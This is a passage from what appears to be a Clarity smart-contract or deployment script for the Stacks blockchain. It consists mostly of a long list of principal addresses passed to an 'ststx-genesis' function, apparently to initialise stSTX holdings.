'SP3WME8GN520XQZTAQPN2DE7TFJ1BMFF1DNT3MFDC
'SP37VVGH7R4AQ51PBNW9XY9VQ17J2QNXJTHB98M42
'SP3JYB93AP7H01SWH1V5KHYX1HHSMFW4YPHM4PVJZ
'SP2SRZRX3VVB0RNW5BCSWH3N31GTTTQ7XMQ05SJGP
'SP2KKZM6CRKRADDH8TNYJG5750VX0ACV67XZWA0M8
'SP1XWJJY7R1SWHBZWCM0J6F6XVSKECWTW67C3ZBV7
'SPH8ZCQ6GF0M7AT1D7NWQ6EESFT3Q532FC996SQM
'SP3YXP980PP4SF7QSCZF811KX26P5VDPTEB4NW1QD
'SP1YM65DNXYHEKMCWDN9WJ60NV00Y91ZNC74J84VA
'SP2V9F2EBH6VDGK3XFW2ZWBNB6MRV5NGMX37240CQ
'SP1YEPYCQP39HBK44CJG01BNK3C5YGW0C3CY264M2
'SP13VAJ379Y4E4ZVM9TR691TC45JE67WPNC9D04FM
'SP7QXF69DV4B5TV0GJGJFED2JBRED62BAX24R086
'SP2Q3HY4G7JN1QJCF7VD64XRDH4ZA4GCFX6YKCT93
'SP257KSSM0AEWESXCYQCMC2G6KZSVBWA0Z7MZVHJ6
'SP16TQDMA1Q3K95K35WZZWCQR50A8XWJFWYA3XXAZ
'SP179WWPFCKKYM6T7W2FJMXAAECDX1JSX9BPZFRQ2
'SP2NT64G6E3PDX7E43MM52G0APGWBX92NTJ2BVH4D
'SP1DZDS891XD26BH7S77A7WTXXM22ES4PCM5V23KH
'SP1B4EQTC849KPCDSXE81XMS7BRV7FF1QD0WZTE8S
'SP1NWT4G0T5RFR5PV499CR590H36MPGE9GPSV13J7
'SP1HR9TM4G05MGBZKBGXX81Y2DTYCZV46KGFAJB3E
'SP1CJG6GC40GS4QGQ2E6QK5CFPTZN8XHXDBNH11JD
'SP37C4805FDJEEYS7VHXB85VQPYCPMS4VZPS5V5D3
'SP24SRQ9CKS1DH4TE45G3T7ZWSDTGX47WCFHNPYJD
'SP3WV1W44DDZVJ703ZP5VGZX6J8R743NAG1E8J13W
'SP3YQ1HJSVKYNGGH680H8VAADZZCKW8ACSDN3BFAT
'SP1Q5EZ5NDY0J7RA2ZNS75B19W7W77BNTWBTN10W0
'SP3791RVH3SG7RJNEBYT7WV2S4HWDAT6HCN5CZ7MY
'SP2PJ6WW2JTWBQZ3QVR6T9TW9FN5B20EAJBGMEZHJ
'SP37HFGZMC5ZR1XY060TMASF5706CZ620K6NE7MWA
'SP1767NFXV9T359S66ME0ND0FTZ51ZSW9EKC45D8H
'SP2WFE6Y77CWKGF8AADJR4HB30WDSQEDXRA2NCX3Z
'SPA6DVSF7S0DEXE4NWG6JQBX3BEA5AS5PEE2NQXP
'SP3R4VK47F6W9XPGERQ5NQSCV6NCHQFHF16TB6NW0
'SP2TEQAEJBYCATEYPJDKT6S06XM5EW227JF5FA8RK
'SP1CEGXN3KG3GZRR2QC3EGC85XVC2CN2113JNQP2
'SP32N0QKN7GVVHZ4HS3QQV9H8ZTHAMZ2JZR2AB7XM
'SP2BZ3HE8W7EW7BGW4EVXGZFD768XYHSVY2D7QG3B
'SP2YJ3JANF1WDV5B0NZT90K4RHYS06D138Z8DRPEF
'SP1SBVFE47E4P5EEJ6K0FXHX8CEDMY1MCFPAMEA60
'SM3R2EKYY0NF9KF0WVYDMQ5F2YBCC8NEY8VC336S8
'SP13T9WAF02JGKSDFXDVT96F26XHAT7ADPHTCSXCR
'SM1793C4R5PZ4NS4VQ4WMP7SKKYVH8JZEWSZ9HCCR
'SP16FDS862CKN0G4CCGBNDCNVAMTHPBKN2JHR0BDA
'SP1CT21ED84NQZTSQJNNQTZ3PGFWQFHKV7R57NV8G
'SPPXDVB5CT002QSJZ4FHPSNR4GMJ94K8ZY6XS062
'SP34AMJYVCDKN3M165827DE7RFDC7H50B83AQEZVJ
'SP288ZS5P2XZH902AC48SE6ZS67VX2ZC3AWVND51G
'SPMH77QTWYPY4N0ZN593GBQNV8XY3ZBF796SSJYH
'SP1T73AVPX73WV7MPP36E9N287TB85APRSDGGHNVA
'SPVWS9RP9S7W52485DV5T6CVVW7T433SV0K4GSF0
'SP2XT8RRK1HA3C7SBFD1H3PCDBHC47KNMF2477G3S
'SPXRS43QWAZHPRXQK4BHWX557FGVW46V0M3S3Y8V
'SP3N3JXAAFPHGHB7HDYZA8GCESF2G9W0B51W8YN79
'SP31FWSM8QWE0SW78S1V3E1RBR47CCVM929SFW1F1
'SP3T6T93PJD494YSMHQVFKH1QDRTZ2TTKY4K0WCCK
'SP1DPMFJ36T3EVC09EJNXXEBEQ7SNDE29DGCEXQXX
'SP1BB3WM8V11MHW7509ADV384SKNRR124PAB5C078
'SP96DY3S1EKPJW4SXBCZ31QKJSPDH9AHS2M2VP7A
'SP2S7MKS888DDNN27CMYYWNT71VD3GCNZN29H4A4R
'SP315VSSAXKH7KHNZZ2QMPFZMQ6ATVFH56J9E2473
'SP1FSC209R87CJTATW1GWAG3T6G8MPJXHWFSDA9PM
'SP37WP07K6M2FEBEDB7W97QQ5WVC0JWXQZ94DVCJB
'SP151Z84AVPBZTRDF64SD5RBPPDZGQTSXH32QY2BW
'SP28V79WH0PGHMM1BA96WQC9RSJ82JZNBXERHPZSE
'SP131AGDJN6E0MTS4CFNSF6D0G79J7SPF27GB3AVS
'SP1Y567T70J1NACN5V8KS44H2M621NHP21T9W9H1
'SP2V01PZ25VRX46DGQNP7PJ5FA6EH5EVZC2DD0G3F
'SP2QV18K6HB5NBE2RWHKH1HY2A3HKJ4NVW7KYN2SY
'SP3HTQNR9221S4B3YDJABMFZDYBGJY68K1H8RVJ2
'SP2BR0NM8XR7T477X5DDF9XZ6N9PB6B8X22X8ZBB8
'SP1PAWKN2S9RRA7FSJ3ZE7F06ZS573X5B2ANNBD39
'SP3P1WDHVDJR54QPF6HKTW15R279KSYZHHXPT9QRA
'SP3DCV25CKJAGQ0KG7EATN43RV9CPQ3WM8X36VYY7
'SPFX4V9G2JM33A8QGK49X3Y6JH35N7KM7XY9KCC7
'SPWGH5A63XMR8J1PM2TXMGH0FN27BG9DM4G0AMFB
'SP3Y9GF2P5C5C5TS3V40C8BHW0X8E4MWPFT1SFWJ4
'SP3YV712H0W6JD2CER7Y3ED07R71AYSSZ8FXNH6R0
'SP1YH591G4Y1A7XDQYFQAJMC0T6XVN5TZJ6C7ZNYH
'SP2EW9Z6B4F2H88VKEWVXQCY9PQP61PDEGQQJ4MCA
'SP18TZ6QD1P9QM4ZXYGG1K5HPGB9R0Q6MBPEV5ZDM
'SP2R6VJQAYBMXF5SGYPDP6E4HMHXTES756315D6CM
'SP3FF0FC1XGGTC1CJ18ZEMEJECQ8Z32RWV6S93VCY
'SPQXNKDBPDK3378YG4GAM3EW109T6Y8M67J5Z510
'SPANF9T6T1QANZ249VM8V71QW53Z8WTE47Y0TB3K
'SP2WT72VV4SHYKMACVGMZC6BX50AFFS2RNXG9EYPN
'SP1KVWVB0W4SGT37KJVT6HPRMJAFQDHSK4FX6ENYP
'SP3BV09AGQ71B3MSQH0HZ0NBRF6ZYVME7FZEMGN9A
'SP3RJS4QP75KN62C9ZMJ8V2V0D7DPXSWJ83GDHRRF
'SP32VSYN9PR2F71GTTBAQTSKKBSQQCRGC8NDKGNSR
'SP2J875P1DR8GB2A3KTNVMMSENPP34W8G5CXWR5EK
'SP3AGTSFY9WTMWX4FJHD5K0MCWA4A2KJ42KADCJNZ
'SP12E9DE7KZBMH4KPYK94JA54KDBCMNR255DRZAXJ
'SP2M694M6YYBS11TNTF8TADMY4GKCW725EGJ5B8T3
'SP2YH5HKSVBNSSG65Z7Z0RFQ13W1HYSY340WASWD0
'SP2W8XHE7V11X9QK19CN85JS80GMJVDSN88HKCZN3
'SP36Y664SW5K3CN8MVH1Y6G348CZFHSN480SV7Z93
'SP2ZV3R3T766Z1JFAD43FHSMXVFK4KKTCTRXQQ26D
'SPNBV8EG7SC3G52SEJTPT1Z8BF0ZY9HD1E29VNBR
'SP1644C7C5EW99FD9HTKB6G8P4PKC9FZH6ZTP13V0
'SP19P51DNENYEM96PVNKSYNJE4Z5705ZJC08ZS007
'SP1H0E04NRGCDCHNHSNN3BKV0JE2TTGDK74DKVX33
'SP1T0TPP7W9PD4KPN2JVH5QB7KMJPRTVQ0Z4JJ3YT
'SP23NE4G6EWJ7Z8NEHR7R2RFHV7CE0JJ9W7PCDQ1H
'SP2GXCNC1VBWP0MVRJZPBH4N8CNRDWYYXZAW4282C
'SP3KRQY4ZPJGCM400GWZ38ZFDCFM40W639GA3183W
'SP3QYH60XA10PY0RN4Q1DTSG9NFBBBM3MZ1TQ4ANM
'SP3SXZEV9KGEF5VM9N1CVHY9482XJ50MNS4KPSSCD
'SP3TCKRCZFT9KVN0NWBDHTZ3PZW22YEQYJBM9KCP3
'SP3VP65DBWXE6MHH6SKG2A7ZRRPWX4K69JZKWPEH9
'SPHDWQH9H6QKV24Q8K9BZJ7JS0JSHF5ATKPJ9V03
'SPSAQVX01P4BWSRCHAACFY6DQP3G1367A578XWTM
'SPEK42NNV3BVYBY2KFQYX0PVE7Y9GF52C5M65ASD
'SP2ZB5YN81ADDT24XBRR7XEJYC1PXQVSJGCNSP2JX
'SP1J87KRWZSR9ARNK6MXXCB1KY7YPBN9EQGZYXH09
'SP19X1QMRZ49WN6B53GCEFW61C1VQA5TYH14PJ3C6
'SP27N8NMVQ8026DWFF0E127E3JGQYEPT33K7ND2NM
'SP1QN8WTB0R365V3A81X5ZK69B6F3TSCRNJ1J27MG
'SP2JWXVBMB0DW53KC1PJ80VC7T6N2ZQDBGCDJDMNR
'SP3RJJTZY19WP6DMFNXWAJ2E6MNPNRW3VB7T8H78H
'SP3TVCNPW6QZNP6J8KCF2Y0TQXC2129ME9J9VQKYR
'SP26NDWGMN4S990HC29GBBQ1J9Q1504RSG4F16P3G
'SP2Q7T1HQ1XSW4GVPGN0ZE2TSZEMSSA65FNKWFQ23
'SP3SZW9DSTZQBRD1W952XB43DSN4H395SYM91309W
'SP34CMQ5M5C28V5KX4EERCVFQB3D1CVBS3MVPJ83Y
'SP39T8HQ7FEVF8PGC2PCDJ1W55KR8HNXPJGZ5X4KN
'SP29PZ55K6YDGNNZNFWMVQM88F54YCDNB4X37HK6V
'SP2Y5WK8W30JGR8688GT68TVJXX91QV5347KPDZJS
'SPKXZSBCXF87DJV0JBPKD7JTNC5FF2B33MJHCJKX
'SPXM9P9JT25J1QMJVE0RVCFDS3KER41WCYHXMZ95
'SP1AXM9JZT1VGA3KG6XY13P2ZV2JWP4R6XQCZKWTJ
'SP1VY550QT01SN3W273CZ00KDZT6R6S25KRNQTV74
'SPYQ829C0KWNEVETW09C93CCBHV3AGM60AKS66AJ
'SPM0BB3QY267R9HAKZ5CK64BQQ5ATXKQ77JEERV1
'SPTE7JCT1GRDWMD5DW2E1D50CYAX1S2RJMF3T179
'SP3WED0KDQV3W5N373PWVPJPES104072ATQ0ZYFD6
'SP23GE83SFHNCB3KR62DP4MZKAV49ZK6MPHF9M3R0
'SP3KRK0D2XBP6Z8AMMGG8HAAWBJ5KR4TX7X174X5Y
'SP12BW77ZBV0GPG5DED2PNVPFPE4R5M84MKPSDNSA
'SP3MSWTZFVR21PV7KANJ5BVZB9ZW8ZX87XESQZHX
'SP28W1WTB0DQTCXSEVA87JZS2DSCZ0EN2RAH1VM3Q
'SP1ZSCS3G134ZVCKJ41CJ15PQNT53CY3T5F0VXG1F
'SP1PA0NWHFMVR275MDQNRYVQ7DCK2BQNERWY6W2Y7
'SP2TBTHBA3KQEWN1ACEPASHERWEZR0M3N0G6R5V0J
'SP1AACPS05G8C5SQ3SXMPWPGMJDRYAFCBZ4ANG8D2
'SPTTMSCY1FJ8T4KT9MEYQ6AC1AG3K0YT1VFP2910
'SP13YD92TF6B8DMQJETTEAAT332N5813AB8CK653P
'SP2T1H6BXQDEEZX5YE4BYQC55V9TT42F8SMEYWGB5
'SPEQT31GBTYFPTQXYQNBY79XX4Z8CSYMP4N5PGF7
'SP26HN082BWVVVHCH8EFBGBDQ31N8QN1RNV4RYXSE
'SP13123XSBVPR1FZAEMNXQ8KWTHARC2D7JHC4AZ6V
'SP243T35YA1AP7VHY08GC8JHNP7QMEE4PX2Z8Z7N6
'SP38Z6V5HMJ33QFAZWEPXSDCRRSVRHETBT3VJMT5R
'SPA8V92TPE61N9E30QMEF7PTY6MGEKH9DV92Z0GR
'SP2KK8C0PK7ZKHT9A2SS0EN8E0WFHDS2KJRH1D6CT
'SP3WC8956611PWJHSXHXZ89KESXSY3ARFNG2ZDD7E
'SPD14TWVGXK36F86XSZ1PRMQ72E7CHFJ161T47SY
'SP15R6BTTGBTM4A9ABB4B2DPS34C7S1A9VMKA05G
'SP29AEFCRGJJPTR14QBZS4QGF319Y9TAEKSKX1PXJ
'SP2X52XC75GMHR5KDMSTRD854KYTCN5796CW65KR
'SP2FND3FF6W7J2115GXVS4M71H5JR8469E4DJYRHK
'SP356PHJTMQEWZC4NBCFDK33906MAQ2AFPB52WJ9F
'SP3EYT4Q7SP16RXJHW7FFCBE8PMFAEYMAXW1PQGPE
'SP3MPKFSEH22YBFFEC2EM8BRE7598Y73EXNTWQK3Y
'SP2T6YEYDKKF8M88D2E9Z5RBE1JDDEWF0RZ19214Y
'SP9J6H2E4QWYQZPPQ6G8312F99C7GHHS89YA1QSG
'SP3HZ7NQCMZSA6VXM2HTM4W2WBGC39Y28MRKCTRJ2
'SP3VQS5BN7TW822645NZMTS339ZBXNDET3QCAZASJ
'SPXK3V35X9Z0NZ7ESEYX303DEXHME6H7CECQANJ1
'SP1HWF7WWHCD7H7476EMHTVP8GDTJ5A4QRDTC7G8F
'SPQVNRGHTZBVJHYVV73MX61XMM9TPH0MVAZJ57RQ
'SPK0K1AD4AR08MW3G493F1VN16RTYQY0YX7AZ33M
'SP1S3XDE2B5FNPQW9FHTN5K8T7J18DQ18N0MV4492
'SP23SHNY9M0F0XDB1AG5CPFRH9KZC895VMA3SQXKJ
'SPGAW3MCH65T77H80F5EMHDT0DKKC5DM8WWCDVVR
'SP2DMVHM0NH211WF7MPGYZ2YS0CK4BH1JWPWFE0V2
'SP3MYD5J70AH6MQZPGX9M7E1XKBYQ2K1G2T54HZH1
'SP1Z2S40AVAYMWRK8NMDQNF57S3ANPQPH3ECJRWQA
'SP2PGXMVVDQTE1VW2JWNDQKDJNWRMF7NVDMP2WSZZ
'SPW2TJZB8A8DWK86WCZHP7TZAN8PZ1SJ3MFCP9H
'SP3X7S74TZE1GK0TH5MWPV1GSJD2TCKPYX5DCGVNK
'SP1E9P7QZDD4JJC6P5X1MYH4DVAP4Q9QZ9HMVKCQ5
'SP3FTHPG7AF7758VPCXRB1VJDKMP1QPMY4DJ5YSY8
'SP1CH4NRTGKD4ZVRK6P9Q1VF6KX38J72NTPZ32VMD
'SP1H3Z4GGZPHMXW0CREW5TJW91JTWGWY1HT5VSY8E
'SP3YWPX6Q0TM8AXRA1KW4S5QEKW9GJSJVE8T4E9JJ
'SP18F4EJHWEA5Z95Z7XTHS90C52856J0KT74X3A9P
'SPJQG2VE5BR1QV35MHVGVTZEJ9AE53S973P12YZT
'SP24C0E8FVV0JXCSNC965V3W3FKBGZ2KEQ3FQQ5S8
'SP2QDVGDKQK30GSKWT5XM29D7VXKDVV5CNCZTEK08
'SP2W8FZ2WRT6G86Z001CA8TP717H4ZHTCVBF7FXF6
'SP2JHQ103180P2CPNW774J7S13MD6W5XEN8QNVF7W
'SP2K6WZC00FPVA5ZAT49CHQ5FTQH0AHAF9AYC3QE8
'SP2V6H5MBX9AB1ZKQA86Y266Q02ZYTAM569Q1JCBH
'SP199C757G4CXMZ939RXGR2R80CTPD7SQVVE60Z4V
'SP6QNAP9RE943562D5D3HX8YJK93DJPCHK61AYW0
'SP19HP4DJF6847S6480867ZA5HX4NJA8YGKWKM8Z7
'SPTBAXKRKT7EXTZ6QRZFG1145M0BZ0TTX3HJZTFW
'SP13YV2QVDTJYHFX5XPAW2DV3G7W7CW0B6DC9FJE6
'SP3SJZZ12CM2MCXG6MMD6S3CJWZ2PDDHA4Q6HPNMW
'SP9TK979CP1M06DBZX72943CJJQ27T5BXC0VVV1W
'SP8KEK2QRRPC371HWQE2SGVMY7ABK3YBNBGAK7MF
'SPE9FA0GRQRJWC4M69ZE8AB547TQMTGJ71T0ZCN2
'SP0BBYYTYXSXP1VXPS7BVJYM25549N1S7R3KN1VM
'SP31PE7BWE2JK071045WAE36PANDZ7BTHDXP0CBZ4
'SP34E3BYCAXK8S7T411QZ04DQ2CR1QKVNXWSE9P1G
'SP3TGHXEXHA17ZVNRVSF0CB492PDP6WM7SHG8M1Q
'SP2T1QF8EHK7N54ZC6Q07S65X38XFDKBZ780K512Z
'SPCQB00KS4PTPTD14H79DMFEGSBKW3VFVRK3F5HS
'SP3Y4FBG02E39JM2Y9KA6NPTWW4MAP9HEBVYC40SD
'SP17XSFQHG8RMQ1SEV9W9T7K5TTGHF3MRSNPDXPMV
'SP1WGJ08BNHRJQ4D3EV2DRKBD2N6EVZ18ENAJHRWX
'SP345RF8C0FDEESN2JVG904K423W1VF65CBSSFHM0
'SP2F022B6BFGTM7J0Q2DG4YZNCB7W2NAAE10F79N1
'SP34DY6G1YVGF95V1RTBNEQFXMBR5JY0CNTYDHJRH
'SP1C60T0DD0364NV701TYZ9YDXZ5WENZFZ58HF8V5
'SP27HQHQJNC1J5709ZKAERYEQ9PNGVXAVH503N0RK
'SP1PS8F8KCW6NAQZBPRXMV9MJYT90CBRMY8K38Y67
'SP318EJ83GA33NHBATJV81A8QPKYTEJXVAWT3F7X8
'SP1WZXKCS9PP41QW8XCZPYWGZFJJ8GVHZSVDA7Z3G
'SP1ZBF36XHB08Z981VJCQ51YKXBBB6A7QCKC7Y5KM
'SP2J4ZRN77XHVEG0PSD9H0K6662TY72KFWDY17PZ9
'SP34JSBQFMM43HYQWJKKK07MFTQE9Y4553VA2PS5X
'SP3A7R70XCE047NAP0WEMJDKS7CS41K3J5KZ7RC66
'SP1KP9E4V26VP4DZEBEH9JMSYDWRJEY98KHFFP2A5
'SP16RY4880624WAFHBFM86D04M6YFFMR8SX932YNH
'SPXPP6R4NRE0879V1ZRCRG6R62K8T02K0HAGB61P
'SP248S4R22ESN0ZQ2CKD8JC85YDFCPR6J2D8R5AKN
'SP3SJFERFAW051RK9Q74QZ6G7AC5M9T9ZM5FAZ8N3
'SP29E3Z51PJV8JA7D0CBENDE7DPF2RG2K2CTFR663
'SPBWV567QSW8101V28XWE0N126RAX906JN8YZR20
'SP2H1HWW2ZWRAFM8PEYG1NZNEGYJMXNSGJMRXMB76
'SP3N4AJFZZYC4BK99H53XP8KDGXFGQ2PRSQP2HGT6
'SP3M2DCVCS4062MHW3MVWN05YJX8QWM7BHBDPCQB8
'SP186VM8Z76K49DA2BZ8T6B3Y77STCBY9Y54PBKNZ
'SP6EC0HG2C0WVNSNQDDWG9RRMZ9A44E9YX9G6M28
'SP1N1M6WNAXVM0F5D9V69DXXCD3KXK7DTGDWV2Y1
'SP3YPBS92X6324XXMSKKKHE4D93GEBEK888JP8X9V
'SP1495PYV55G7S2P6FMG69H0N2M74N40M6K97VCE5
'SP16RDK4T5FJHGR71Q4YQD9CKGCFXFFQK7GARPV11
'SP2B0Q5R4W3N5QT1MW0DHXYERG1NDRE9WXZ9PJY8M
'SP3X68BDJVJPV6CS1JEBYGDAXSEXV71X0QRSZ0F0N
'SP3K6RAE7HJPF5JQN1Q00HM5D9ZGPH750WTKXZDA1
'SP2J0X5N7ZA8AEKC5ZYJV9CSBCHQB02E6V335F98A
'SPBJ2JB5DFF644DFXEVXA1EHJX3RWZP9VB4CZ8NR
'SP3BF7ZTVVJBM16FYW5DBSK7T81PMRN3WFC2GTETJ
'SP1HYBBVKX8FWV4T30A3V03BHDWDKPGYQA98K3GHN
'SP3HN16H5XFF9MS6YTAPP6Y59KF67Z4RWYYMZ2VBS
'SP1Z5HSSSSJYTXTM9TNZNG6AH4NYS1CM2G8SKJ89M
'SP1WH97VSCG19ZA3ATKSTFHXQY4QYQ71E3EDZFWR1
'SP3W4E52NVM88QD1V82WMAX0TR7YRRD9K1D8Y2J8M
'SP22C2S0GCBZZ97FPVV6EDYP02XXY0K9XA5RN9NA5
'SP353780544GN6YRM71WMHWG98KNKNFGGA93TFJS1
'SPKT90W9Z44B76FM2BYYYY8G0PD5E7R3DMRNRQAJ
'SP21E4WGWMP23CYE31KYAV1BS1VWZA9MD9PZRWE1S
'SP2GXYSGTWZDT66NDJVQA6GHD6D60C9F8Y85JYZTC
'SP3HPK41DWVP0QVBAHKWVDBGAYXWJA7R2NMQZMW6G
'SP289J0CKK3W48RTS0HVWX4EXDJYK4NPKZ96VEEYN
'SP1STQX29N0J8KRF7KN8V7CYGNBCN9GTW2781DASZ
'SP390HW8AGYC5KNX81EDHXSYJJ0QGX6DFDG4PGRSZ
'SP398ZJR7072J0FHEN2MK2T4Z0Q1BNEENVHWN45SB
'SP68V3MZM7SQA44AY2HM3EFSVACB3D1PJ8SK8V7A
'SP2CS6HTBN4SE149P8M82WM3A2MQA8HH8EFRDTTYJ
'SP3H5CRENA8TA1SSYEQ5TXS66AWR9FWH2YA5WJA7V
'SP9JMDNGJ8M63QPPCGMW91AJAD4R01F76J0GHBC1
'SP2VGWYCQ7SS6MNNZ8WMPT0ZFXC97K0ZKWHTJ82NQ
'SP11YYC1GZB1AH8WK1D5XPDMGSG7JC44CEY8V4KHN
'SPFJQ1HKXPHNPK9RWWT6V30B9HRA6HJC0QZYM9ND
'SPDVFKZCHNCNMKPTRB7QD9J3MCE0NG6WXZE1QMZB
'SP5MX9KTJW1MARJHAQGZM7TM7RD5W8NA6ZBE7E5J
'SP1V732KKW9X0EPR86A7Z9EZHYQEVMC3W2EQAC826
'SP2KM72BPMA8S4J33B872EDC92DHA7T5M8C5BGB85
'SP1EBCX34XRWZWYQWTB0SN656SCMKFA0MTCMEPPS0
'SP7ZFQWWHTVKTE34XC2NYHP8M4Y81P16YVP596RD
'SP3QWRXDT6JSQ56KGPECNK8JM2Z3DT9Y6F0N65ZHE
'SPY219YWTN1K9EP8TV7PMWKAW8EZR71NJV4E500M
'SP123EVPE3PA6XJZ90CEZ3SVR8KWTEFCZD65NKDWB
'SP3H0NS574RJ3DJYFJ1JDNNC3JNMF761JMTTJRCPW
'SP27EBP7KRAXWH2NMR6H2971N8MGK3P88R4X6XABX
'SP28WN3F0690396KGT7QSY2QZH966B01V5DFFSRDD
'SP1JEDCKN031WBJNR6JWFQQR6E5HE5ZQ3J2JWDZT4
'SP1XNJJSTQK1KBCECPD99BWJM376HGDQZJ70G6ZY3
'SP81456QE6ZHAK4SFA3EYW8BJ9ZE3M3W64VNQGM5
'SPPQ1PQ36GFEX96R0GPYFKP0KTJA52T1NNAXSG43
'SP2VQZWS9W9FBJJB1735V2RNDZ9RMF4ZBX66ABPEM
'SPMZ912TEK2P15E8Q9W1W33QN793XR7XVDYY4R8H
'SP238CMVR9JJVH0FWNPJSQ3NENM8K7NBCZFX90NHB
'SPMVRSEEVRJAZ356SEK72GSFGZGH0P39ZCB4J7VN
'SP3BK01NQBKFGA8W39N7YQ4QH2G6K9T5FP0258VY6
'SP1KWMJYPHM5RFC6DEFEV4S3NKETTBRGN8KD3B4WB
'SP2HGPVW4135AH0H04CYX5WDJ027TXM66DF3ABJ7W
'SPM1MR3J8MD2NV09ADTDEW8M82Z1B3VJVWZH7RN5
'SPWDXXNHYRRDJJ7BQW6FQRF9Q070T80ZK15SP9PB
'SP37FPAYBQ03NRTST46BZC47BJ221M6KSF23SZX82
'SP31NBJ62TGM9FPSV6FBTB2GHT3MY1AEMYHBF16N6
'SP39JPDSS5EASBZ6RP34W27GCTM3TGP8DRW1FHTY1
'SP1QN8M43G4XJHER7RNFBG964EC0SZY1XZ3HV4MT4
'SP11Y3YBVGYQPQN7Z18GCF761GCTAW9T21G78KS0F
'SPG2XWVNPVH3S2XEQ18PW6E6SSVNZMPDSV6FDZWG
'SP2HVNHJ3WSXRJ0DX0HC39N6XJCGRWSV32PEPMVNJ
'SP1YWFP80QE1GD65MPGCXE509R0662DXJ9ANCKWDD
'SP3FS1ZKVNH0S9ZHKJGZJFD4C17KAK2A4G8NJA3HD
'SP2AR5GX1Y93JNFR68DJ1VJ7AWAMJ3RVKF314DYJ3
'SP3JGR0B4GWDT4MKGCAY5F5MKWTGV9RKPJ0STT3TT
'SP1HFGMT42DTT5HTZXBQW3Z5V4CCHN4FBY085BG19
'SP2FYSWRV9BNEJ7FDS785YJV825N6YMDWS3BGGQHN
'SP23H4K59JWBRSZM6KVA3XMH0JK04MAXVXTK4PB4G
'SP1KTAW824VFBC49JXYKBYEB8JPFVFK3Q2MPYX5BM
'SPS4HWEXC0C1GK18YS02P7P4RHR35AT67B4YD0VV
'SPRY4GZYFWXPZM09P3ETG5T766MTPHY4028F158N
'SP187P5HHS6R6X0KRT5SNKBT4XVJGAHWF0ZTY2GVT
'SP3JVQKB9BCDCX4N7Q1ZD0JE0XP8FAQK03KGNGJJX
'SP3R1EEXQNJAN9W5C25806FCSSZC86SKKBXDTK1SA
'SP318CCPFB5Q28G4ZHCVTBRZ601MHAYS9PZ2BVFX6
'SP2HXYVH099AG75853T03HB127YX1RWXEKMGGJAWV
)))
    (ststx-genesis principals))
)